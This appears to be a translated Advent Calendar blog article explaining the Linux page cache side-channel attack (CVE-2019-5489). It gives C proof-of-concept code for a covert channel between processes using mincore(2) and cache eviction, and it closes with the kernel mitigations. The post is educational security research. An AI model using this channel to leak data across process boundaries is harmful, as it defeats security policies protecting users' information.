[LINUX] About Page Cache Attacks (CVE-2019-5489)

This article is the 15th day article of Kobe University Advent Calendar 2019.

Introduction

The purpose of this article is to be registered as CVE-2019-5489 announced at CCS 2019 ** Page cache attacks [ Summarize ^ 1] ** and actually implement a simple PoC. The implemented PoC can be found at Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux.

The page cache is the disk cache used by the Linux kernel (a software mechanism that allows the system to store data stored on the disk in RAM), and Paga cache attacks are side-channel attacks that use the page cache. Is. Unlike side-channel attacks on the CPU cache (hardware cache) such as Flush + Reload [^ 2], it uses the page cache (software cache), so there is no hardware dependency. In addition, Paga cache attacks do not need to use a timer to measure time, but use the return value of a system call. It is also known that side-channel attacks against software caches such as Paga cache attacks are also performed against the cache of Web browsers, and information such as history can be extracted [^ 3].

Page cache attacks [^ 1] shows some examples of attacks in a local / remote environment. For example, Covert Channel (an attack that transfers sensitive information between processes that are not allowed to communicate by security policy), ASLR bypass, and keystroke timing acquisition. This time, I implemented PoC of Covert Channel in the local environment of Linux.

About page cache

A certain understanding of the page cache is necessary for creating a PoC, so we will explain and experiment with the page cache. The page cache is a software cache used by the Linux kernel and is used to cache data on the disk. Upon a file read / write request from a user process, the kernel looks in the page cache, accesses the disk if it does not exist, and adds the read data to the page cache. This allows later processes that use the same file to use the data in the page cache without accessing the disk. The important thing is that ** when you access the file, the read data will be added to the page cache **. Also, since the page cache is created on RAM, its capacity is finite. Therefore, if the cache capacity is insufficient, some pages need to be expelled from the page cache. Page cache management is managed by two lists, an active list (active page LRU list) and an inactive list (inactive page LRU list), which collects recently accessed pages in the active list and keeps them in the inactive list for a long time. Collect pages that are not accessed and evict pages from the inactive list. As shown in the figure below, when the page is accessed, the state moves as shown by the used arrow. For example, the first access to a page will go from state 1 to 2, and if that page remains in state 2 and the page is accessed again, it will move from state 2 to 3 and enter the active list. In other words, it is possible to ** enter the active list with more than one access **.

Move pages between LRU lists

Let's actually experiment with the movement of active and inactive lists. First, turn off the swap function, create a 1.0 GB file, clear the page cache, and create a test environment. (If the RAM capacity of the PC is small, it may be better to reduce the size of the created file)

$ sudo swapoff -a
$ dd if=/dev/zero of=tmp bs=1M count=1000
$ sudo sh -c "echo 1 > /proc/sys/vm/drop_caches"

Next, repeat the command to display the used capacity of the active / inactive list of the page cache and the command to read the 1.0 GB file created above.

$ cat /proc/meminfo | grep file
Active(file):     314140 kB
Inactive(file):    56372 kB

$ cat tmp > /dev/null
$ cat /proc/meminfo | grep file
Active(file):     314140 kB
Inactive(file):  1080620 kB

$ cat tmp > /dev/null
$ cat /proc/meminfo | grep file
Active(file):    1338020 kB
Inactive(file):    56740 kB

The first file read increases the size of the inactive list by about 1.0 GB, the second file read increases the size of the inactive list by about 1.0 GB, and the size of the active list increases by about 1.0 GB. There is. In other words, it can be seen that the first read puts it in the inactive list and the second read puts it in the active list, which is the same as the explanation above. A similar experiment for a larger file size (16.0 GB) gives: On the first read, the inactive list is not large enough for the file to survive the page cache. Therefore, the page cache is not hit on the second read, and the size of the active list does not increase.

$ dd if=/dev/zero of=tmp bs=1M count=16000
$ sudo sh -c "echo 1 > /proc/sys/vm/drop_caches"
$ cat /proc/meminfo | grep file
Active(file):     298924 kB
Inactive(file):    21148 kB

$ cat tmp > /dev/null
$ cat /proc/meminfo | grep file
Active(file):     297080 kB
Inactive(file):  2090576 kB

$ cat tmp > /dev/null
$ cat /proc/meminfo | grep file
Active(file):     296684 kB
Inactive(file):  2088860 kB

About Page cache attacks

attack_overview.png

The outline of paga cache attacks will be explained using the above figure.

The prerequisite for this attack is that ** the attacker's program and the victim's program can access the same page cache **. This is possible if the attacker and victim programs are running on the same operating system and are using the same shared libraries and files. In the example above, libfoobar.so is shared among the three programs (Victim # 1 Program, Victim # 2 Program, ʻAttack Program), so Victim # 1 ProgramYou can also access the same page cache where the data inlibfoobar.so that you accessed to execute the foo () function is cached from ʻAttack Program.

With page cache attacks, ** an attacker can use the information about whether a page in the page cache has been accessed to know the behavior of the target program **. In the example above, Victim # 1 Program accesses thefoo ()function when t = 1, 4, and ʻAttack Program is foo () in libfoobar.so. Checking if the page of # 0 (0x0000 ~ 0x0fff) corresponding to the function is in the page cache. ʻAttacker Program confirms that # 0 is not in the page cache when t = 0 and that # 1 is in the page cache when t = 1. You can see that the foo () function has been called. And by chasing the page of # 0 from the page cache in preparation for the next call, you can know that thefoo ()function was called again when t = 4. it can.

So how does an attacker know if a page is in the page cache and how to get the page out of the page cache? Whether it is in the page cache is possible by ** mincore (2) using the system call ** Is. Since mincore (2) returns a flag indicating whether the calling process's virtual memory page exists in RAM and disk access does not occur, it is easy to check whether it exists in the page cache. Also, instead of mincore (2), it can be judged from the time required to process the page fault. You can take advantage of the large time difference between soft pagefult (just mapping pages from the page cache) or regular page fault (loading data from disk). Then, by ** repeating access to a large number of files **, files that already exist in the page cache can be expelled. However, this is a bottleneck for this attack because it takes longer than calling mincore (2). A more efficient method than simply accessing a large number of files is introduced in the paper [^ 1].

In this way, ** attackers can see the behavior of other programs through side-channels such as mincore (2) and the time taken for page faults. ** In the example above, we can only know when the foo () function was called, but if we could know the behavior of a program that depends on sensitive information, the attacker could know that sensitive information. You will be able to know.

Implementation of Covert Channel using Page cache attacks

Covert Channel is a type of attack that creates the ability to transfer sensitive information between processes that are not allowed to communicate by security policy. page cache attacks allow you to send information from one process to another through ** information about whether a page is in the page cache. ** **

I created a PoC that actually sends data from the sending process to the receiving process. The program is located at Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux. The same shared library is used between the sending and receiving processes, the sending process changes the function to call in the shared library depending on the data (sensitive data) to be sent, the receiving process reads the state of the page cache, and the page of which function caches Determine if it is in and receive the data. In addition, two Valid signals (used by the sender) and Ready signals (used by the receiver), which are used to synchronize the timing of data transmission / reception between processes, are also transmitted / received using the page cache state of the shared library. .. The reason why two Valid signals are required is to prevent conflicts with valid signals between two consecutive data transmissions and receptions.

In the following, the code for synchronization between processes is omitted, and only the code for sending and receiving data using the state of the page cache will be described.

Creating a shared library

A shared library was simply created with 64 pages of alignment between each function as shown below. By calling this function, the corresponding page goes into the page cache and can be used for side-channel attacks. The reason why the alignment size is not set to one page is that when a function is called by profetch, the page containing another function is not included in the page cache. This time I used my own library, which is easy to attack, but I think the same thing can be done with other shared libraries such as libc.

#define SIZE 4096 * 64

__attribute__ ((aligned(SIZE))) int func_0() { return 0; }
__attribute__ ((aligned(SIZE))) int func_1() { return 1; }
__attribute__ ((aligned(SIZE))) int func_2() { return 2; }
__attribute__ ((aligned(SIZE))) int func_3() { return 3; }
__attribute__ ((aligned(SIZE))) int func_4() { return 4; }
__attribute__ ((aligned(SIZE))) int func_5() { return 5; }
__attribute__ ((aligned(SIZE))) int func_6() { return 6; }
__attribute__ ((aligned(SIZE))) int func_7() { return 7; }

Send data

Like the program below, you can change the function to call depending on the data you want to send. For example, when sending ʻA, it is 0x41 (= 0b1000001) , so func0andfunc_6 ()` will be called.

void send_data(const int index) {
	char c = key[index];

	if (c & (1 << 0)) {
		func_0();
	}
	if (c & (1 << 1)) {
		func_1();
	}
        ...
	if (c & (1 << 7)) {
		func_7();
	}
}

Data reception

As in the program below, use the mincore (2) system call to get the page cache information of the page containing each function and restore the data. For example, if check_state (func_1) and check_state (func_6) return 1, the recovered data will be 0x42 (= 0b1000010), indicating that the sender sent B. ..

int check_state(void* addr) {
	size_t page_size = sysconf(_SC_PAGESIZE);
	unsigned char vec[1] = {0};
	int res = mincore(addr, page_size, vec);
	assert(res == 0);
	return vec[0] & 1;
}

char read_data() {
	char data = 0;
	if (check_state(func_0)) {
		data |= (1 << 0);
	}
	if (check_state(func_1)) {
		data |= (1 << 1);
	}
	...
	if (check_state(func_7)) {
		data |= (1 << 7);
	}
	return data;
}

Page cache eviction

You can repeatedly access a sufficiently large file (file) as shown in the program below. However, the page cache of the shared library may be in the active list, so access the file twice so that the pages in the active list can also be expelled. (Actually, if you read only once, the eviction was not successful.) By doing this, you can finally get the pages func_0 (), func_1 (), ... func_7 () out of the page cache. After that, the data transmission may be repeated.

int cache_count() {
	int count = 0;
	count += check_state(func_0);
        ...
	count += check_state(func_7);
	return count;
}

void evict() {
	FILE *file = fopen("file", "r");
	fseek(file, 0, SEEK_END);
	long fsize = ftell(file);
	fseek(file, 0, SEEK_SET);

	char* buf = malloc(SIZE * sizeof(char));

	off_t chunk = 0;
	int    flag = 0;
	while (chunk < fsize) {
		if (cache_count() == 0) {
			flag = 1;
			break;
		}
		fread(buf, sizeof(char), SIZE, file); // first read
		fseek(file, -SIZE, SEEK_CUR);
		fread(buf, sizeof(char), SIZE, file); // second read
		chunk += SIZE;
	}

	if (!flag) {
		printf("Failed to evict page cache\n");
		debug_print();
		exit(0);
	}

	free(buf);
	fclose(file);
}

Page cache attacks mitigation

In Linux 5.0 or later, the behavior of the system call of mincore (2) was changed. First, by Change mincore () to count "mapped" pages rather than "cached" pages The information has been changed to return information as to whether it is mapped or not, rather than page cache information. However, this affected programs that use mincore (2), so Revert "Change mincore () to count" mapped "pages rather than" cached "pages Restored by / commit / 30bac164aca750892b93eef350439a0562a68647 # diff-005fb6716ad73caee6506a1279af5f40), then mm / mincore.c: make mincore () more conservative Has been changed to return the page cache status only if you have write permission for the mapped file. This would make it difficult to send and receive data using shared libraries etc.

Reference

Recommended Posts

About Page Cache Attacks (CVE-2019-5489)